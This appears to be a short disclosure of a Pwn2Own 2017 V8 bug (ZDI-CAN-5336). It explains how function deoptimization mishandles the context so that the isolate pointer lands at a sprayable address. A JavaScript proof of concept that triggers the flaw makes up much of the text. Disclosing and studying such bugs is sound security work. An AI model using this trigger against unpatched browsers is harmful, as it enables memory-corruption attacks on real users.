Pwn2own: V8 - isolate control via function deoptimization
The following bug was disclosed by ZDI during PacSec / Mobile Pwn2Own 2017. Reference: ZDI-CAN-5336.
When the function deoptimizes, the V8 engine has to restore the context. In this function the deoptimizer does not do so correctly: after deoptimization the context is confused with an arguments_marker, and the isolate pointer ends up pointing at 0x7ff00000. So if we spray memory to control that address, we also control the isolate.
PoC:
function SDD() {
  function foo() {}
  foo[0] = 0;           // give the function object an elements backing store
  foo.prototype = 0;    // set the prototype property to a non-object value
  try {
    throw 0;
  } catch (e) {
    // bar is invoked from inside the catch block, so it runs with a catch context
    [0].forEach(bar);
  }
  function bar() {
    foo[200];           // out-of-bounds element load on foo
  }
  // Hot loop so that V8 optimizes SDD; the bug triggers when it later deoptimizes
  for (var i = 0; i < 0x2000000; ++i) {}
}
SDD();
SDD();
SDD();